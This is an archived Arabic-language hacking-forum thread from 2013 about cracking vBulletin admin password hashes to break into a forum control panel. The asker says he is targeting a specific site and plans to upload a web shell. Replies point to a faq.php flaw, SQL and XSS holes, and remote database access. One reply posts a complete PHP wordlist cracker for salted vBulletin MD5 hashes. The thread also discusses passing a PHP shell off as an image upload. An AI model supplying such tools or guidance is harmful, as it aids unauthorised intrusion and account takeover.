:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   [استفسار] شباب استفسار بخصوص هاش vBulletin (http://www.vbspiders.com/vb/t67678.html)

hank00sh 05-29-2013 10:19 AM

شباب استفسار بخصوص هاش vBulletin
 
السلام عليكم ورحمه الله وبركاته

اخواني ما ابي اطول في الكلام هل فيه طريقة لتخطي الهاش هذا حق vBulletin والدخول الى لوحة التحكم

لانو هوا الحااااااااااااجز الوحيد الي من اول ما بديت تعلمت الهكر وهوا قدامي وماني داري كيف افكه

حاولت اتعلم لغات برمجه عشان تساعدني فيه بس ما فيه فايده

اذا فيه طريقة ومضمونه وتكون 2013 لا تبخلوون عليه فيها

تحياتي لكم :shiny01:

MaFia 05-29-2013 02:41 PM

رد: شباب استفسار بخصوص هاش vBulletin
 
هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد
لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت
salt
او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه

لكن سؤال

من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

hank00sh 05-29-2013 09:21 PM

رد: شباب استفسار بخصوص هاش vBulletin
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Cyber Mafia (المشاركة 462912)
هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد
لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت
salt
او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه

لكن سؤال

من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

من مسار لوحة التحكم الخاصه بسكربت الفبلتون من خلال السورس بيج :bigsmile:

وحاولت اعدل على السورس بيج وغيرت الهاش الى هاش مفكوك وجاهز ما صلح يمكن فيه طريقة تكوين كود برمجي ينفع للكل بس للاسف خبرتي قليله في اللغات حقت البرمجه

تحياتي

MaFia 05-29-2013 11:20 PM

رد: شباب استفسار بخصوص هاش vBulletin
 
من الاساس هذه ليست ثغره شوفت في 2007 كذا موقع يحكي عنها لكنها ليست ثغره
الفي بي اقوى سكربت حتى لو كان فيه ثغره لن تستطيع استغلالها بسهوله

hank00sh 05-30-2013 03:59 PM

رد: شباب استفسار بخصوص هاش vBulletin
 
شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره

وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه

اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك

MaFia 05-30-2013 10:37 PM

رد: شباب استفسار بخصوص هاش vBulletin
 
الفي بي مو صعب تخترقه كل شخص وخبراته لكن الثغرات المعروفه اصبحت نادرة وشبه مستحيل يقع فيها مبرمج يعمل في هذه الشركه باستثناء
ثغرات
sql
x s s
اكثر انتشارا هذه الايام

اما ثغرة ملف
faq.php
التي تقصدها لساتها موجوده في الاصدار
3.8.6
في ملف اللغه الانجليزيه

ولازم يكون في شل مرفوع على السيرفر لكي تخترق المنتدى ولو كان الروت مفعل remote sql تستطيع الاتصال ريموت بهذه المعلومات وتتصل بالقاعدة


فك هاشات الفي بي ليس له حل جذري لكن انتظر اي شخص يجاوبك

mido868 05-31-2013 01:16 AM

رد: شباب استفسار بخصوص هاش vBulletin
 
اقتباس:

المشاركة الأصلية كتبت بواسطة hank00sh (المشاركة 462936)
شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره

وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه

اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك



حبيبى ممكن تجرب السكربت هذا

او هناك طريقة ثانية اللى الجميع يعرفها فايرفوكس +Live HTTP Headers
وتقدر تتابعها من هنا
http://www.nextgenupdate.com/forums/...ecryption.html

والكود التالى لسكربت php لم اجربه لكن تقدر تجرب هذا ما اتسطعت ان اساعد به
كود PHP:


<?php 
set_time_limit
(0); 
error_reporting(0); 
$name $_SERVER['PHP_SELF']; 
$go true

echo 

_____ _ _ _____ _____ _______ 
/ ___| | | | | / _ \ / ___/|__ __| 
| | _ | |__| | | | | | | |___ | | 
| | | | | __ | | | | | \___ \ | | 
| |_| | | | | | | |_| | ___| | | | 
\_____/ |_| |_| \_____/ /_____/ |_| 
____ _ _____ _____ _____ ___ ___ 
| _ \ | | / _ \ / _ \ | _ \ \ \ / / 
| |_) | | | | | | | | | | | | | | \ \ \/ / 
| _ ( | | | | | | | | | | | | | | \ / 
| |_) | | |___ | |_| | | |_| | | |_| / | | 
|____/ |_____| \_____/ \_____/ |_____/ |__|[*]-----------------------------------------------------------------------[*] 
[+] Script Name : Vbulletin Hash Cracker 
[+] Version : 1.0 
[+] Programed By : G-B 
[+] Email : [email=g22b@hotmail.com]g22b@hotmail.com[/email] 
[+] Use : php 
$name[*]-----------------------------------------------------------------------[*] 

"


while(
$go){ 
$b true
$c true
$d true
$k false
while(
$b){ 
echo 
"[+] Hash -> "
$hash trim(stdin()); 
if(
strlen($hash) < 30){ 
echo 
"[*] This Is Not MD5. Try Again.\n"
}else{ 
$b false


while(
$c){ 
echo 
"[+] Salt -> "
$salt trim(stdin()); 
if(
strlen($hash) < 3){ 
echo 
"[*] This Is Not Salt. Try Again.\n"
}else{ 
$c false


while(
$d){ 
echo 
"[+] Wordlist Link -> "
$list trim(stdin()); 
if(!
file_get_contents($list)){ 
echo 
"[*] Can't Open Wordlist. Try Again.\n"
}else{ 
$d false



echo 
"\n\n"
echo 
"[*]------------------------------Start------------------------------------[*]\n\n"

$wordlist file_get_contents($list); 
$words explode("\n",$wordlist); 
foreach(
$words as $pass){ 
$pass trim($pass); 
$md5 md5(md5($pass).$salt); 
echo 
"[*] Try $pass \n"
if(
$md5 == $hash){ 
echo 
"\n\n[*] Password Cracked : $pass"
$k true
break; 


if(!
$k){ 
echo 
"\n\n[*] Can't Found Password In Wordlist."


echo 
"\n\n[+] Crack Another Hash ? (Y) or (N) -> "
$try stdin(); 
if(
$try == 'N' || $try == 'n'){ 
$go false


echo 
"[*] See U Later G-B."
#============================================== 
function stdin(){ 
$fp fopen("php://stdin","r"); 
$line trim(fgets($fp)); 
fclose($fp); 
return 
$line

#=========================================== 
?>


hank00sh 05-31-2013 02:19 AM

رد: شباب استفسار بخصوص هاش vBulletin
 
يعطيكم العافيه اخواني وبخصوص الكود اخوي انا ماني رافع شيل عشان استخدمه اقصد الاسكربت

ماني رافع شيل على السيرفر عشان استخدمه انا مستهدف موقع وحاااب اخش عليه من هذا الموقع عشان اقدر ارفع شيل

من خلال لوحة تحكم المنتدى بس اخو سايبر وضحلي نقطه انو في سكربت فيه ثغرهfaq.php

وراح احاول اجدها في السيرفر لعلي اوقعلي فيها واقدر من خلالها معرفة الديدا بيس والدخول على الموقع على طول او رفع الشيل

وعندي سوال بسيط الحين مواقع الرفع وبالذات موقع ترادنت حاولت ارفع شيل بصيغه صوره مع انو مكتوب الاحجام المقبلوه ومن ظمنها فيه بي اتش بي بس رفعتو يقلي خطا ورفعتو عن طريق اداة live HTTP الي في الفاير فوكس وتحياتي لكم


الساعة الآن 01:28 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0